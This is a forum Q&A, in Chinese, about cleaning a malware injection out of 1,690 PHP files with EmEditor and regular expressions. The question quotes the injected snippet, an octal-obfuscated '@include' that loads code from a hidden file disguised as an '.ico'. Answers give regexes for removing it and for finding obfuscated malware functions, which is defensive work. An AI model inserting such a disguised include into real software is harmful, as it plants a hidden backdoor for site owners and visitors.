我嘗試找到一種使用 EMEditor 和正規表示式來尋找和替換的方法。我嘗試將此應用於以下項目:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
我嘗試替換/刪除之間的程式碼
<?php
和
// ini_set(?display_errors?, 1);
兩者之間的所有內容都是我試圖從許多文件中提取出來的惡意軟體腳本。
我正在尋找一種簡單的方法來刪除 1690 個檔案中的此內容。任何想法都會非常有幫助。
最美好的祝愿,托馬斯
答案1
任何類似字串的 PHP RegExpression 都是...
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
這可以進一步簡化,但按原樣工作
**注意,這將找到所有以包含5 個不是換行符的隨機字元的註解區塊開頭的違規字串,後跟兩個新行、@include 行、另外2 個新行以及匹配的區塊註解閉包-無論如何文件是否保存在 Windows、Mac 或 Linux 電腦上 - 注意 \r\n(Windows 電腦)和 \n\n(Linux 和 Mac 電腦)
我已經在正則表達式中驗證了您的字串匹配: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
快速注意,要尋找包含隨機字串名稱(其中包含模糊函數)的惡意軟體檔案...使用以下正規表示式...
/function...\(\$..\){\$...\=."/
這應該追蹤被更改的文件,並找到與您受到影響的惡意軟體相同的任何其他惡意軟體檔案。
祝你有美好的一天!希望這對某人仍然有用。